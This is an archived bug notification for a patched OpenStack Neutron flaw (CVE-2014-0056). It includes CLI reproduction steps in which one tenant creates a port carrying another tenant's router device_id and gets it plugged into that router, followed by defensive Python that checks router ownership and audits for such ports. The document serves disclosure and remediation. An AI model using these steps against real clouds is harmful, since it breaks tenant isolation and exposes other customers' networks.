yahoo-eng-team team mailing list archive
Message #25536
[Bug 1243327] Re: [OSSA 2014-008] Routers can be cross plugged by other tenants (CVE-2014-0056)
** No longer affects: neutron/grizzly
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1243327
Title:
[OSSA 2014-008] Routers can be cross plugged by other tenants
(CVE-2014-0056)
Status in OpenStack Neutron (virtual network service):
Fix Released
Status in neutron havana series:
Fix Released
Status in OpenStack Security Advisories:
Fix Released
Bug description:
The l3-agent does not check tenant_id and allows tenants to plug ports
into others' routers if the device_id is set to another tenant's router.
# Become admin tenant
arosen@arosen-desktop:~/devstack$ source openrc admin admin
# Create router as admin:
arosen@arosen-desktop:~/devstack$ neutron router-create admin-router
Created a new router:
+-----------------------+--------------------------------------+
| Field                 | Value                                |
+-----------------------+--------------------------------------+
| admin_state_up        | True                                 |
| external_gateway_info |                                      |
| id                    | 80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 |
| name                  | admin-router                         |
| status                | ACTIVE                               |
| tenant_id             | 04e94acfe69f4960a69c6a78d39466c4     |
+-----------------------+--------------------------------------+
# Become demo tenant
arosen@arosen-desktop:~/devstack$ source openrc demo demo
# Create port with correct device_id and device_owner
arosen@arosen-desktop:~/devstack$ neutron port-create private --device-id 80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 --device-owner network:router_interface
Created a new port:
+-----------------------+---------------------------------------------------------------------------------+
| Field                 | Value                                                                           |
+-----------------------+---------------------------------------------------------------------------------+
| admin_state_up        | True                                                                            |
| allowed_address_pairs |                                                                                 |
| device_id             | 80ffe19a-649c-4fc9-a0d9-2a3d67c5f600                                            |
| device_owner          | network:router_interface                                                        |
| fixed_ips             | {"subnet_id": "5786a0a6-24c8-4156-b981-cc817011c6a7", "ip_address": "10.0.0.3"} |
| id                    | 895cf428-4bfb-4c79-86c2-d40af9bf3587                                            |
| mac_address           | fa:16:3e:21:33:6c                                                               |
| name                  |                                                                                 |
| network_id            | 4de8b4f6-ac11-4836-aefb-7ed4f49ab9a7                                            |
| security_groups       |                                                                                 |
| status                | DOWN                                                                            |
| tenant_id             | ad069ea620614cce9c4b6f088d39d03e                                                |
+-----------------------+---------------------------------------------------------------------------------+
Now when the l3-agent is restarted or enters its periodic sync state:
arosen@arosen-desktop:~/devstack$ sudo ip netns exec qrouter-80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 ifconfig
lo        Link encap:Local Loopback
          inet addr:127.0.0.1 Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING MTU:16436 Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

qr-895cf428-4b Link encap:Ethernet HWaddr fa:16:3e:21:33:6c
          inet addr:10.0.0.3 Bcast:10.0.0.255 Mask:255.255.255.0
          inet6 addr: fe80::f816:3eff:fe21:336c/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
          RX packets:4 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:300 (300.0 B) TX bytes:398 (398.0 B)
To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1243327/+subscriptions
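The ownership check that the report above shows missing, as an added illustration that is not Neutron's own code or the OSSA-2014-008 fix: a non-admin tenant may only bind a router-interface port to a router owned by its own tenant, plus an audit helper that lists ports already cross-plugged. The function and exception names are hypothetical, the router and port records are constructed from the identifiers in the report, and counting network:router_gateway among the checked owners is an assumption of the example.

```python
"""Ownership check for router-interface ports, mirroring bug 1243327.

Illustrative code, not Neutron's own: a port whose device_owner is
network:router_interface binds itself to a router via device_id, and the
vulnerable code never verified that the router belonged to the tenant
creating the port. Sample data is constructed from the bug report.
"""

# Assumption of this example: gateway ports are treated the same way.
ROUTER_DEVICE_OWNERS = {"network:router_interface", "network:router_gateway"}

# Constructed router table: router id -> owning tenant (values from the report).
ROUTERS = {"80ffe19a-649c-4fc9-a0d9-2a3d67c5f600": "04e94acfe69f4960a69c6a78d39466c4"}

# The port the demo tenant created against the admin router in the report.
DEMO_PORT = {
    "id": "895cf428-4bfb-4c79-86c2-d40af9bf3587",
    "tenant_id": "ad069ea620614cce9c4b6f088d39d03e",
    "device_id": "80ffe19a-649c-4fc9-a0d9-2a3d67c5f600",
    "device_owner": "network:router_interface",
}


class DeviceIDNotOwnedByTenant(Exception):
    """Raised when a non-admin tenant targets a router it does not own."""


def check_router_port(port, routers, is_admin=False):
    """Return the bound router id if the port may be created, else raise.

    Hypothetical API-side validator: only an admin, or the router's own
    tenant, may plug a port into a router. An unknown device_id is also
    rejected, so a tenant cannot pre-register a port for a future router.
    """
    if port.get("device_owner") not in ROUTER_DEVICE_OWNERS:
        return None  # ordinary port, no router binding to check
    device_id = port.get("device_id", "")
    if is_admin:
        return device_id
    if routers.get(device_id) != port["tenant_id"]:
        raise DeviceIDNotOwnedByTenant(
            "tenant %s may not bind to router %s" % (port["tenant_id"], device_id))
    return device_id


def find_cross_plugged_ports(ports, routers):
    """Audit existing ports: ids of router-bound ports whose tenant differs
    from the router's owner (candidates created before the check existed)."""
    return [p["id"] for p in ports
            if p.get("device_owner") in ROUTER_DEVICE_OWNERS
            and routers.get(p.get("device_id")) != p["tenant_id"]]
```

Running the audit against the ports of a live deployment flags the demo port from the transcript, while a port created by the router's own tenant passes both the check and the audit.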